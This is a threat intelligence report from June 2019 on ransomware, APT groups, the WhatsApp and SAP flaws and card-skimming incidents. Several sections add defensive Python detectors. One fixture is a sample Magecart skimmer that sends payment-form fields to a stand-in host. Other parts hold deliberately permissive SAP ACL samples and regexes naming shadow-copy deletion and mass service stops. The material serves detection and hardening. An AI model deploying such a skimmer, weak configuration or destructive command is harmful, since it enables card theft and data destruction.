
June 2019

Threat Intelligence Report


IN THIS ISSUE
• New supply chain threats
• Ransomware exploits Oracle WebLogic
• Hacktivism on the rise
• WhatsApp risks to mobile devices
• New Lazarus Trojan discovered

About this report

Fusing a range of public and proprietary information feeds, including DXC's global network of security operations centers and cyber intelligence services, this report delivers an overview of major incidents, insights into key trends and strategic threat awareness.

This report is a part of DXC Labs | Security, which provides insights and thought leadership to the security industry.

Intelligence cutoff date: May 24, 2019

Supply chain vulnerabilities expose critical assets

Mark Hughes
Senior Vice President and General Manager of Security
DXC Technology

We've seen another active month with third-party security risks playing a role in major breaches, meaning it is more critical than ever to understand supply chain exposure.

Ransomware continues to be a growing threat, with an increasing number of attacks against enterprise environments, often referred to as big game hunting.

Hacktivist groups are also very active, but the good news is these attacks are becoming less effective where proper security controls are in place. I encourage you to read more about the latest threats.

Table of Contents

Threat updates
• New ransomware variant exploits Oracle WebLogic vulnerability (Multi-industry)
• Hacktivism increases in the first quarter of 2019 but is less effective (Public Sector, Healthcare, Education)
• E-commerce attacks more valuable than ever (Retail)

Nation state & geopolitical updates
• Advanced supply-chain attacks attributed to Chinese group dubbed Barium (Multi-industry)
• Lazarus group develops new Trojan malware dubbed ELECTRICFISH (Public Sector, Manufacturing, Technology & Research)

Vulnerability updates
• WhatsApp vulnerability leads to compromise of mobile devices in highly targeted attack (Multi-industry)
• 50,000 enterprises may be at risk to potential SAP software vulnerabilities (Multi-industry)

Incidents/Breaches
• MIRRORTHIEF targets 201 online campus stores with card-skimming attack (Retail)
• Possible MegaCortex ransomware attack disrupts accounting software provider Wolters Kluwer (Multi-industry)
• CITYCOMP breach exposes financial data of numerous enterprises (Multi-industry)

Attack motivations (Source: Hackmageddon)
• Cybercrime: 81%
• Espionage: 14%
• Cyberwarfare: 3%
• Hacktivism: 1%

Threat updates

New ransomware variant exploits Oracle WebLogic vulnerability

Attackers are using vulnerability CVE-2019-2725 to facilitate the spread of a new ransomware variant dubbed Sodinokibi.

Impact
The critical vulnerability affects Oracle WebLogic servers, which are used for building and deploying enterprise applications, and allows unauthenticated remote code execution. Attackers require no user interaction to deploy the ransomware. Once installed, the ransomware instructs victims to transfer bitcoin to a specified address in return for the decryptor.

Notable features of the ransomware include the use of vssadmin.exe to delete Volume Shadow Copies (the automatic system backups Windows relies on for local recovery), and attackers following up the Sodinokibi deployment with attempts to infect the same target with GandCrab ransomware. Industries and organizations targeted remain out of the public domain, although Cisco Talos suggests there have been numerous victims.
Source: Threatpost, Cisco Talos

DXC perspective
Organizations using Oracle WebLogic are urgently encouraged to patch servers. The flaw was not patched in the standard quarterly update in April; Oracle issued the fix out of band, so applying the April Critical Patch Update alone does not address it.

Hacktivism increases in first quarter of 2019

Prominent hacktivist collectives such as Anonymous, LulzSec and various newer groups continue to use relatively low-skill attack vectors, such as distributed denial of service (DDoS), website defacement, and exploitation of misconfigured databases, to gain attention and support their various ideologies and causes.

Most targeted industries
1. Multi-industry attacks
2. Public Sector
3. Communications, Entertainment & Tech
4. Health & Life Sciences
5. Banking & Capital Markets

Impact
Attack success rates vary, typically in relation to the cyber defense maturity of the targeted organization. Recent successes have been seen against government departments in Africa, where Ghost Squad Hackers continued a campaign against the Sudanese government. In early April, Ghost Squad and others claimed to be launching DDoS attacks against 260 domains a day, leading up to the removal of the autocratic president Omar al-Bashir. Anonymous launched similar attacks on departments of the Zimbabwe government in late 2018.

Other hacktivist collectives, particularly those operating in high-income countries, have reportedly had more difficulty when targeting government and media interests. Many groups now focus on low-hanging fruit, such as government subsections or universities.
Source: Wired

DXC perspective
Hacktivist campaigns will continue targeting multiple industry verticals, with public sector, energy, education and healthcare at heightened risk. The attackers typically will be motivated by political, social and environmental issues.

Faced with maturing cyber defenses, hacktivists may seek to increase social engineering activities and use novel methods to disrupt targets. Misinformation campaigns aimed at damaging a target's "brand" could further provide hacktivists opportunities to cause disruption outside of the scope of traditional cyber defenses.

E-commerce attacks more valuable than ever

Payment card information stolen from online stores is increasing in value as demand for card verification value (CVV) numbers is outstripping supply.

Impact
CVV resale prices have now risen to match those of cloned payment cards used at physical point-of-sale (POS) terminals.

Previously, data stolen for "card present" fraud, where criminals create physical clones of cards, was considerably more valuable than card data usable only online. POS card clones were $15 to $20 a card, whereas CVVs ranged from $2 to $8.

However, recent monitoring of dark web marketplaces shows CVVs are now as valuable as POS data sets. A single CVV will routinely cost in excess of $20. The principal drivers for this dynamic are likely an increased demand for stolen card data on the dark web and increased difficulty in cloning physical cards due to wider chip-and-PIN adoption in G20 nations.
Source: Gemini Advisory

DXC perspective
This situation may partly explain the increased prevalence of attacks on e-commerce sites in the last 12 months, with a number of prominent card-skimming campaigns hitting online stores across various industries.

Barium APT
Who are they?
• Advanced adversary that uses supply chain compromise to enable highly focused targeting. Also known as Wicked Panda; the ASUS operation attributed to the group was named ShadowHammer by Kaspersky.
Where do they operate?
• Intelligence and analysis suggest they are likely Chinese-speaking. They target globally.
What do they want?
• Barium appears to focus on targeted espionage, most likely in support of Chinese strategic goals. Intellectual property, sensitive government documents and research are likely objectives.
Do they work alone?
• Probably not. They have links to state-sponsored Chinese group APT17 and potentially cybercriminal group Winnti.
How can I stop them?
• Defense in depth and mature technology solutions are required. Fundamental security solutions include understanding your supply chain risk and effective mailbox, endpoint and network protections.

Nation state and geopolitical updates

Advanced supply chain attacks attributed to Chinese group dubbed Barium

The group is believed to be responsible for the significant breaches of ASUS in March 2019 and Avast's CCleaner software, affecting 500,000 and 700,000 devices, respectively.

Impact
Barium uses supply chain attacks to compromise hosts en masse, but actively exploits only a small number of preselected targets. Of the half-million devices implicated in the ASUS breach, the malware activated on only 600, based on predefined MAC addresses written into the exploit code. Similarly, only 70 of those compromised by CCleaner saw secondary spyware downloads.

Features
The group typically exploits trusted models to deploy malware. Notably, it compromises update servers of suppliers and uses them to push out malicious payloads under the guise of legitimate updates. The group's access to the suppliers enables it to use genuine signatures and certificates, making detection early in the kill chain extremely challenging. Evidence suggests Barium also chains supply chain attacks to gain deeper or more advantageous access. The compromise of CCleaner, for example, was used to target ASUS.

Though Barium's ability to compromise major software and hardware suppliers has given it access to more than a million devices, the group appears to show little interest in destructive actions. Instead, it focuses on highly targeted espionage operations. Its targets are not known, but intelligence points toward the group being aligned with Chinese state interests. Barium may also operate as part of a wider collective of advanced adversaries. Its code shares fingerprints with code previously used by the state-sponsored Chinese group APT17, and it shares tooling with cybercriminal group Winnti.
Source: Kaspersky, Wired

DXC perspective
Barium poses a serious and credible risk to public sector, research and technology enterprises holding intellectual property that would be advantageous to Chinese strategic aims. It also poses a serious threat to suppliers of hardware and software, which it will seek to compromise to gain access to their true targets.

For the true target, preventing Barium from gaining initial access may prove challenging. Through compromise of supply chains, the group can package its well-obfuscated malicious payloads within legitimate activities and with genuine certificates.

More crucial is the ability to detect and disrupt malicious activity within your networks at the earliest opportunity. Next-generation endpoint detection systems, well-configured security information and event management (SIEM) and user-entity-behavior analytics can assist in detection. Diligent privilege and account management, coupled with network segmentation, is an effective method of disrupting adversaries in their efforts to navigate internal networks to obtain sensitive information.
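The MAC-gated activation described above has a defensive mirror image: once a vendor publishes the implant's target list, an organization can test its own asset inventory against it. The check below is an added example written for readers of this report, not Kaspersky's, ASUS's or DXC's tooling. Kaspersky reported that the ASUS implant carried its targets as hashes of MAC addresses rather than the addresses themselves, so the check compares hashes; the inventory rows, the target hashes, and the canonical form that is hashed (lower-case, colon-separated, SHA-256) are assumptions made for the example.

```python
"""Fleet check of an asset inventory against a MAC-address target list.

Added example, not Kaspersky's or ASUS's tooling. The inventory, the target
hashes and the canonical form hashed (lower-case, colon-separated, SHA-256)
are assumptions made for this example.
"""
import hashlib
import re

_HEX12 = re.compile(r"^[0-9a-f]{12}$")


def normalize_mac(text):
    """Accept aa:bb:cc:dd:ee:ff, AA-BB-CC-DD-EE-FF, aabb.ccdd.eeff or bare hex
    (the notations that appear in real inventory exports) and return the
    canonical lower-case colon form."""
    digits = re.sub(r"[:\-.\s]", "", text.strip()).lower()
    if not _HEX12.match(digits):
        raise ValueError(f"not a MAC address: {text!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def is_locally_administered(mac):
    """Bit 1 (0x02) of the first octet is set for randomized, VM and
    admin-assigned addresses, which identify no particular vendor hardware."""
    return bool(int(mac[:2], 16) & 0x02)


def mac_hash(mac):
    """Hash of the canonical form; the target list is distributed as hashes."""
    return hashlib.sha256(normalize_mac(mac).encode("ascii")).hexdigest()


def targeted_hosts(inventory, target_hashes):
    """inventory: iterable of (hostname, mac_text). Returns the hosts whose
    hardware address is on the list, plus the rows that could not be judged."""
    hits, skipped = [], []
    for host, text in inventory:
        try:
            mac = normalize_mac(text)
        except ValueError:
            skipped.append((host, text, "unparseable"))
            continue
        if is_locally_administered(mac):
            skipped.append((host, mac, "locally administered"))
            continue
        if mac_hash(mac) in target_hashes:
            hits.append((host, mac))
    return hits, skipped


# Constructed target list: the hashes of two addresses, as a vendor might
# publish them without disclosing the victims' MACs.
TARGET_HASHES = {mac_hash("00:1e:8c:4a:91:2b"), mac_hash("0c:9d:92:7f:13:e0")}

# Constructed inventory export in the mixed notations seen in practice.
SAMPLE_INVENTORY = [
    ("eng-lt-042", "00-1E-8C-4A-91-2B"),    # dash notation (Windows export)
    ("eng-lt-043", "001e.8c4a.912c"),       # Cisco dotted notation, not listed
    ("fin-ws-007", "0C:9D:92:7F:13:E0"),    # upper-case colon notation
    ("build-vm-01", "02:42:ac:11:00:02"),   # locally administered (container)
    ("printer-3f", "not recorded"),
]

if __name__ == "__main__":
    hits, skipped = targeted_hosts(SAMPLE_INVENTORY, TARGET_HASHES)
    for host, mac in hits:
        print(f"TARGETED  {host}  {mac}")
    for host, value, why in skipped:
        print(f"skipped   {host}  {value}  ({why})")
```

The normalization step is the part that matters in practice: a target list compared against raw export strings misses every host whose MAC was recorded in a different notation or case, and locally administered addresses are set aside rather than reported so that container and VM interfaces do not drown the result.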

Lazarus group develops new Trojan malware dubbed ELECTRICFISH

Though best known for attacks aimed at financial gain, Lazarus retains its capability to conduct advanced espionage operations. Its latest backdoor Trojan, ELECTRICFISH, was discovered following joint work of the U.S. Department of Homeland Security and the Federal Bureau of Investigation.

Impact
The malware is predominantly a tunneling tool: it relays traffic between a configured source IP address and a destination IP address. It uses a custom protocol to tunnel the traffic and continuously attempts to reach out from both the source and the destination systems, allowing either side to initiate a tunneling session.

The malware can be configured with a proxy server and port and with a proxy username and password, which allows it to traverse a proxy that requires authentication and so reach outside the compromised network. Indicators of compromise are available.
Source: US-CERT

DXC perspective
Lazarus is likely to target organizations that hold information that may aid North Korean strategic interests. This may include public sector organizations in North America, Europe and the Asia-Pacific region, and global manufacturing, technology and research organizations.

Although this spyware appears to hold greatest utility in espionage operations, Lazarus has traditionally been oriented toward financial gain. It remains possible this tooling could be used to support data-theft-for-ransom attacks. This risk will heighten should the economic situation in North Korea continue to degrade.
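Whichever side of an ELECTRICFISH tunnel initiates, the endpoint inside the network has to cross the enterprise proxy, and a tool that continuously attempts to reach out leaves a regular series of CONNECT requests in the proxy log even when every attempt succeeds. The detector below is an added example, not US-CERT's indicators or DXC's code: it groups CONNECT requests by client, user and destination and flags the series whose inter-request gaps are nearly constant, with a bare IP:port destination as a secondary signal. The log lines are constructed in Squid's native access.log layout; the thresholds (six hits, 15% jitter) are assumptions.

```python
"""Periodic CONNECT detection over web proxy logs.

Added example, not DXC's or US-CERT's code. The log lines are constructed in
Squid's native access.log layout; the thresholds are assumptions.
"""
import re
import statistics
from collections import defaultdict

# Squid native layout: time elapsed client result/status bytes method URL user hier/peer type
LOG_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s+(?P<elapsed>\d+)\s+(?P<client>\S+)\s+(?P<result>\S+)\s+"
    r"(?P<bytes>\d+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<user>\S+)\s+"
    r"(?P<hier>\S+)\s+(?P<type>\S+)$")
IPV4_PORT = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}:\d+$")


def parse(lines):
    """Yield one dict per well-formed line; blank or foreign lines are skipped."""
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["ts"] = float(rec["ts"])
            yield rec


def find_beacons(lines, min_hits=6, max_jitter=0.15):
    """Group CONNECT requests by (client, user, destination) and return the
    series whose gaps between requests are nearly constant."""
    series = defaultdict(list)
    for rec in parse(lines):
        if rec["method"] == "CONNECT":
            series[(rec["client"], rec["user"], rec["url"])].append(rec["ts"])
    beacons = []
    for (client, user, dest), times in series.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean   # coefficient of variation
        if jitter <= max_jitter:
            beacons.append({
                "client": client, "user": user, "dest": dest,
                "hits": len(times), "period_s": round(mean, 1),
                "jitter": round(jitter, 3),
                "ip_literal": bool(IPV4_PORT.match(dest)),   # tunnel to a raw IP
            })
    return beacons


def _line(ts, client, url, user, peer):
    """Build one constructed access.log line (all tunnels succeed: TCP_TUNNEL/200)."""
    return f"{ts:.3f} {120:6d} {client} TCP_TUNNEL/200 4520 CONNECT {url} {user} HIER_DIRECT/{peer} -"


_BASE = 1557907200.0   # 2019-05-15T08:00:00Z, constructed
SAMPLE_LOG = "\n".join(
    # a tunnel retrying every minute with small jitter, via an authenticated user
    [_line(_BASE + t, "10.20.30.40", "203.0.113.10:8443", "corp\\svc_build", "203.0.113.10")
     for t in (0.0, 60.4, 119.8, 180.2, 240.1, 299.7, 360.3, 420.0)]
    # ordinary browsing: many hits, irregular timing
    + [_line(_BASE + t, "10.20.30.41", "www.example.com:443", "corp\\jdoe", "198.51.100.20")
       for t in (5.0, 95.2, 102.9, 340.0, 341.5, 900.4, 1150.0)]
    # a mail client polling every ten minutes: regular, but too few hits in the window
    + [_line(_BASE + t, "10.20.30.41", "mail.example.net:443", "corp\\jdoe", "198.51.100.7")
       for t in (12.0, 612.0, 1212.0)]
)

if __name__ == "__main__":
    for b in find_beacons(SAMPLE_LOG.splitlines()):
        print(b)
```

Tune min_hits to the window you scan: on a day of logs the ten-minute mail poll above would clear it, which is why the output keeps the period and the IP-literal flag so that a regular series to a named corporate service can be whitelisted while a regular series to a raw address is escalated.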


Vulnerability updates

Prominent ransomware (2019)
LockerGoga
• Targeted manufacturing and industrial enterprises. Operated by an advanced actor that combined automated and manual techniques to maximize infection scale.
Ryuk
• Initially thought to be a revised Hermes ransomware strain operated by a North Korean group. However, new intelligence suggests it is operated by a prominent Russian cybercriminal. Targets enterprise-scale organizations, using Emotet for initial access.
PewCrypt
• Bizarrely does not require a financial ransom, rather wanting victims to subscribe to YouTuber PewDiePie in order to receive a decryptor. Distributed via spam.
Katyusha
• First appeared in late 2017 and uses the EternalBlue and DoublePulsar exploits to propagate. Primarily delivered via spam.
GandCrab
• Widely seen in 2018, with its ransomware-as-a-service model popular with cybercriminals. Still a principal threat in 2019. Bitdefender has recently released an updated decryptor.

WhatsApp vulnerability leads to compromise of mobile devices in highly targeted attack

WhatsApp pushed an update to its 1.5 billion users after it became aware of a buffer overflow vulnerability that allowed the installation of spyware on mobile devices.

Impact
The vulnerability exists in the WhatsApp voice over IP (VoIP) stack and allows remote code execution via a specially crafted series of Secure Real-time Transport Control Protocol (SRTCP) packets sent to a target phone. Threat actors have already exploited the flaw to install spyware on devices without the need for user interaction. It is widely reported that various journalists, NGOs and human rights activists were principal targets in this campaign.

The exploit was reportedly developed by the Israeli technology company NSO Group. The NSO Group is believed to supply spyware technology to a range of governments globally. The NSO Group says it doesn't operate any of the tools it develops.
Source: ArsTechnica, Infosecurity Magazine

DXC perspective
Exploitation of this vulnerability has been highly targeted to date. However, the WhatsApp security update could be reverse engineered, putting exploits into the hands of more adversaries.

Organizations should ensure that staff are using the latest WhatsApp version on both work and personal devices to mitigate the risk of this exploit.

50,000 enterprises may be at risk to potential SAP software vulnerabilities

Potential vulnerabilities in some SAP software leave enterprises exposed, according to Onapsis Research Labs.

Impact
An exploit tool called "10KBLAZE" utilizes errors in SAP NetWeaver configurations to gain unrestricted access to SAP systems. As well as data theft and destruction, attackers could manipulate transaction data by creating vendors, releasing shipments and making fraudulent payments. It is estimated that 50,000 enterprises may be affected by this vulnerability.
Source: SAP, Reuters

DXC perspective
Adversaries will quickly look to identify and exploit this vulnerability, and exploit source code is already available. SAP recommends that organizations comply with SAP Security Notes #821875, #1408081 and #1421005. Because 10KBLAZE abuses insecure configuration rather than a code defect, the remedy is the hardening those notes describe, and it should be applied as a critical priority.
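10KBLAZE succeeds where the gateway and message server access control lists permit any host to register or start programs. The checker below is an added example, not SAP's or Onapsis' code, and it shows a permissive reginfo/secinfo pair beside a hardened one. It parses the VERSION=2 keyword syntax those files use and a handful of profile parameters the Security Notes concern; the sample files, host names, file paths and profile values are constructed, and treating a permit rule that carries no HOST or ACCESS keyword as a wildcard is an assumption made for the check.

```python
"""Checks for the SAP gateway / message server misconfigurations 10KBLAZE abuses.

Added example, not SAP's or Onapsis' code. Parses secinfo/reginfo ACL files
in the VERSION=2 keyword syntax plus a few profile parameters. Sample files,
host names, paths and profile values are constructed; treating a permit rule
with no HOST/ACCESS keyword as a wildcard is an assumption of this example.
"""


def parse_acl(text):
    """Return the P (permit) / D (deny) rules of a secinfo or reginfo file in
    file order; the gateway applies the first matching rule."""
    rules = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        action, *pairs = line.split()
        if action not in ("P", "D"):
            raise ValueError(f"line {lineno}: unexpected rule {raw!r}")
        rule = {"line": lineno, "action": action}
        for pair in pairs:
            key, sep, value = pair.partition("=")
            if not sep:
                raise ValueError(f"line {lineno}: malformed keyword {pair!r}")
            rule[key.upper()] = value
        rules.append(rule)
    return rules


def _wild(value):
    return value is None or value == "*"


def audit_reginfo(text):
    """reginfo: which hosts may register external RFC servers (HOST) and
    which hosts may then call them (ACCESS)."""
    findings = []
    for r in parse_acl(text):
        if r["action"] != "P":
            continue
        tp = r.get("TP", "*")
        if _wild(r.get("TP")):
            findings.append(f"reginfo line {r['line']}: permits registration of any program name (TP=*)")
        if _wild(r.get("HOST")):
            findings.append(f"reginfo line {r['line']}: any host may register TP={tp}")
        if _wild(r.get("ACCESS")):
            findings.append(f"reginfo line {r['line']}: any host may call TP={tp}")
    return findings


def audit_secinfo(text):
    """secinfo: which programs the gateway may start (TP) on which host (HOST),
    at the request of which client host (USER-HOST)."""
    findings = []
    for r in parse_acl(text):
        if r["action"] != "P":
            continue
        if _wild(r.get("TP")) and _wild(r.get("HOST")):
            findings.append(f"secinfo line {r['line']}: any program may be started on any host")
        elif _wild(r.get("HOST")):
            findings.append(f"secinfo line {r['line']}: TP={r['TP']} may be started on any host")
        if _wild(r.get("USER-HOST")):
            findings.append(f"secinfo line {r['line']}: start requests accepted from any client host")
    return findings


def audit_profile(params):
    """params: instance profile as a dict of parameter name -> value."""
    findings = []
    if params.get("gw/acl_mode") != "1":
        findings.append("gw/acl_mode is not 1: a missing secinfo/reginfo falls back to permissive defaults")
    for name in ("gw/sec_info", "gw/reg_info", "ms/acl_info"):
        if not params.get(name):
            findings.append(f"{name} is not set: no ACL file is enforced")
    if params.get("ms/monitor", "0") != "0":
        findings.append("ms/monitor is not 0: message server administration is open to external programs")
    return findings


def audit(reginfo, secinfo, profile):
    return audit_reginfo(reginfo) + audit_secinfo(secinfo) + audit_profile(profile)


# Constructed "as found" configuration: every host may register and call any program.
WEAK_REGINFO = "#VERSION=2\nP TP=*\n"
WEAK_SECINFO = "#VERSION=2\nP TP=* USER=* HOST=* USER-HOST=*\n"
WEAK_PROFILE = {"gw/acl_mode": "0", "ms/monitor": "1"}

# Constructed hardened configuration: named programs, named hosts, explicit deny-all last.
HARDENED_REGINFO = (
    "#VERSION=2\n"
    "P TP=TAXCALC_RFC HOST=taxsrv.corp.example "
    "ACCESS=sapapp1.corp.example,sapapp2.corp.example CANCEL=sapapp1.corp.example\n"
    "D TP=*\n")
HARDENED_SECINFO = (
    "#VERSION=2\n"
    "P TP=sapxpg USER=* HOST=sapapp1.corp.example USER-HOST=sapapp1.corp.example\n"
    "D TP=*\n")
HARDENED_PROFILE = {
    "gw/acl_mode": "1",
    "gw/sec_info": "/usr/sap/PRD/SYS/global/secinfo",
    "gw/reg_info": "/usr/sap/PRD/SYS/global/reginfo",
    "ms/acl_info": "/usr/sap/PRD/SYS/global/ms_acl_info",
    "ms/monitor": "0",
}

if __name__ == "__main__":
    for f in audit(WEAK_REGINFO, WEAK_SECINFO, WEAK_PROFILE):
        print("WEAK     ", f)
    print("HARDENED ", audit(HARDENED_REGINFO, HARDENED_SECINFO, HARDENED_PROFILE) or "no findings")
```

Run it against the files named by gw/sec_info and gw/reg_info on each instance, not only the global copies, and confirm with the gateway's own reload rather than assuming a changed file is live.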


Incidents and breaches

Mirrorthief targets 201 online campus stores with card-skimming attack

TrendMicro reported that the Mirrorthief group's latest round of card-skimming attacks, a tactic often referred to by the umbrella term "Magecart," has affected 201 campus e-commerce stores.

Impact
As with previous Magecart incidents, payment card data was copied and exfiltrated to a malicious server at the point of user entry to the payment page. Mirrorthief compromised PrismWeb, the e-commerce platform used by the stores, to inject its malicious code. Victim numbers remain unknown.
Source: TrendMicro

DXC perspective
Third-party contributor or supplier compromise remains a highly effective way for adversaries to inject skimming code into an array of stores by simply compromising a single platform. The enduring success of this model will likely see it increase in prevalence.

The security of third-party contributors is integral to the security of an e-commerce platform. Organizations should include third-party security considerations within their wider security architecture.
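Because the skimmer arrives through the platform, a store's own release process never sees it; what the store can still control is what its checkout page is allowed to run. The script below is an added example, not Trend Micro's, PrismWeb's or DXC's code: it inventories the script origins, inline script hashes and form targets of a page, diffs a later capture against a known-good baseline, and emits the Content-Security-Policy script-src that would have blocked the additions in the browser. The good and skimmed pages, host names and inline scripts are constructed for the example.

```python
"""Integrity check of a checkout page's script surface.

Added example, not Trend Micro's or PrismWeb's code. The pages, host names
and inline scripts below are constructed for the example.
"""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _ScriptCollector(HTMLParser):
    """Collect external script URLs, inline script bodies and form actions."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self.form_actions = [], [], []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.external.append(a["src"])
            else:
                self._buf = []
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def csp_hash(source):
    """CSP 'sha256-...' token for an inline script: hash of the exact text."""
    digest = hashlib.sha256(source.encode("utf-8")).digest()
    return "sha256-" + base64.b64encode(digest).decode("ascii")


def _origin(url):
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}" if parts.netloc else "'self'"


def inventory(html):
    c = _ScriptCollector()
    c.feed(html)
    return {
        "script_origins": {_origin(u) for u in c.external},
        "inline_hashes": {csp_hash(s) for s in c.inline},
        "form_origins": {_origin(u) for u in c.form_actions},
    }


def diff_against_baseline(html, baseline):
    """Return (kind, value) findings for anything the baseline did not allow."""
    now = inventory(html)
    findings = []
    for o in sorted(now["script_origins"] - baseline["script_origins"]):
        findings.append(("new_script_origin", o))
    for h in sorted(now["inline_hashes"] - baseline["inline_hashes"]):
        findings.append(("unknown_inline_script", h))
    for o in sorted(now["form_origins"] - baseline["form_origins"]):
        findings.append(("form_posts_to_new_origin", o))
    return findings


def script_src_policy(baseline):
    """The script-src directive the baseline implies, so the browser refuses
    what the diff would only report."""
    origins = sorted(baseline["script_origins"])
    hashes = sorted(f"'{h}'" for h in baseline["inline_hashes"])
    return "script-src " + " ".join(origins + hashes)


GOOD_INLINE = "window.checkoutConfig = {currency: 'USD', step: 'payment'};"


def _page(extra_script="", form_action="/checkout/submit"):
    """Constructed checkout page; extra_script is appended to the head."""
    return f"""<!doctype html><html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-payments.com/v3/fields.js"></script>
<script>{GOOD_INLINE}</script>{extra_script}
</head><body><form id="payment" action="{form_action}" method="post">
<input name="card_number"><input name="cvv"><button>Pay</button></form></body></html>"""


GOOD_PAGE = _page()
# Constructed skimmer in the shape described for Magecart: hook the payment
# form at submit time and copy the fields to a third party.
SKIMMER = ("<script>document.getElementById('payment').addEventListener('submit',"
           "function(e){var f=new FormData(e.target);"
           "navigator.sendBeacon('https://collect.example-bad.net/s',new URLSearchParams(f));});</script>"
           '<script src="https://static.example-bad.net/analytics.js"></script>')
SKIMMED_PAGE = _page(SKIMMER, "https://checkout.example-bad.net/pay")
BASELINE = inventory(GOOD_PAGE)

if __name__ == "__main__":
    for kind, value in diff_against_baseline(SKIMMED_PAGE, BASELINE):
        print(kind, value)
    print(script_src_policy(BASELINE))
```

The diff is the monitoring half and the policy string is the prevention half; the hash tokens tie the policy to the exact inline text, so any change the platform pushes to an inline script shows up as both a diff finding and a browser-side block until the baseline is deliberately re-captured.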

Possible MegaCortex ransomware attack disrupts accounting software provider Wolters Kluwer

Access to software giant Wolters Kluwer's CCH Axcess product, a cloud-based tax preparation, compliance and workflow management solution, was disrupted in early May due to what the organization initially described as "technical anomalies." Though it ultimately admitted experiencing a malware incident, Wolters Kluwer stressed that no sensitive data had been stolen and customers had not been otherwise affected.

Impact
Although formal details of the malware are not in the public domain, intelligence suggests the company suffered a MegaCortex ransomware attack. MegaCortex, much like other prominent malware types such as Ryuk and LockerGoga, leverages both automated scripts and manual activity to maximize the number of victims and scale of infection. There is some suggestion that MegaCortex may use the Emotet or Qbot malware to aid in gaining initial network access, a tactic not uncommon in ransomware aimed at enterprise-level targets.

The similarities between MegaCortex and other prominent ransomware families go further. At least one command-and-control (C2) address is shared, and the list of processes and services that its batch file stops is nearly identical to that seen in LockerGoga infections.
Source: SecurityWeek, Sophos

DXC perspective
Ransomware targeted at enterprise environments is a growing trend dubbed "big game hunting." Adversaries typically infect en masse using automated vectors, often using Trojan malware delivered by spam or drive-by download, and then move laterally through networks to compromise domain controllers using manual techniques. Once domain controllers are accessed, the ransomware binaries can be pushed out to the network, maximizing the scale of infection.

The best defense for enterprises is preventing initial compromise through mailbox filtering, perimeter defenses and endpoint security solutions. Next-generation endpoint security and SIEM can also detect suspicious internal actions prior to the ransomware binaries being pushed out from domain controllers, thereby increasing the organization's ability to disrupt adversaries early in the kill chain.
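Both the Sodinokibi case earlier in this report (vssadmin.exe deleting shadow copies) and MegaCortex (a batch file stopping a list of services, binaries pushed from domain controllers) leave process-creation events that can be caught before encryption starts. The triage below is an added example, not DXC's, Cisco Talos' or Sophos' code: it runs rules for shadow-copy and recovery tampering over a stream of events and adds a burst rule for service-stop commands, so that a single net stop is ignored but five within a minute on one host are not. The events are constructed, Sysmon-style JSON lines; the field names (ts, host, user, parent, cmd), the thresholds and the domain controller names are assumptions.

```python
"""Triage of Windows process-creation events for ransomware precursors.

Added example, not DXC's or any vendor's code. The events are constructed,
Sysmon-style JSON lines; field names, thresholds and the domain controller
names are assumptions made for this example.
"""
import json
import re
from collections import defaultdict
from datetime import datetime

# Assumed host names of the domain controllers (for the "pushed from a DC" rule).
DOMAIN_CONTROLLERS = {"DC01", "DC02"}

# Single-event rules, matched against the lower-cased command line.
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete")),
    ("shadow_storage_resize",
     re.compile(r"vssadmin(?:\.exe)?\s+resize\s+shadowstorage")),
    ("recovery_disabled",
     re.compile(r"bcdedit(?:\.exe)?\s+/set\s+.*(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)")),
    ("backup_catalog_deleted",
     re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog")),
]
# One stop command is routine; a burst of them is the LockerGoga/MegaCortex-style
# batch file clearing backup agents and databases out of the way of encryption.
STOP_CMD = re.compile(
    r"\b(?:net1?(?:\.exe)?\s+stop|sc(?:\.exe)?\s+stop|taskkill(?:\.exe)?\s+(?:/f\s+)?/im)\b")
STOP_BURST_THRESHOLD = 5   # this many stop commands ...
STOP_BURST_WINDOW_S = 60   # ... on one host within this many seconds
# A binary or batch file launched straight from a domain controller share.
UNC_FROM_DC = re.compile(r"\\\\([A-Za-z0-9-]+)\\\S+\.(?:exe|bat|cmd)\b")


def parse_events(lines):
    """Parse JSON lines into dicts with a datetime timestamp, sorted by time."""
    events = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%S")
        events.append(ev)
    events.sort(key=lambda e: e["ts"])
    return events


def triage(lines):
    """Return (host, rule, command_line) findings in time order."""
    findings = []
    stops = defaultdict(list)   # host -> timestamps of recent stop commands
    for ev in parse_events(lines):
        host, cmd = ev["host"], ev["cmd"]
        lowered = cmd.lower()
        for name, rx in RULES:
            if rx.search(lowered):
                findings.append((host, name, cmd))
        m = UNC_FROM_DC.search(cmd)
        if m and m.group(1).upper() in DOMAIN_CONTROLLERS:
            findings.append((host, "binary_run_from_domain_controller_share", cmd))
        if STOP_CMD.search(lowered):
            window = stops[host]
            window.append(ev["ts"])
            while (window[-1] - window[0]).total_seconds() > STOP_BURST_WINDOW_S:
                window.pop(0)          # slide the window forward
            if len(window) == STOP_BURST_THRESHOLD:
                findings.append((host, "mass_service_stop", cmd))
    return findings


# Constructed events: one workstation being prepared for encryption, one idle.
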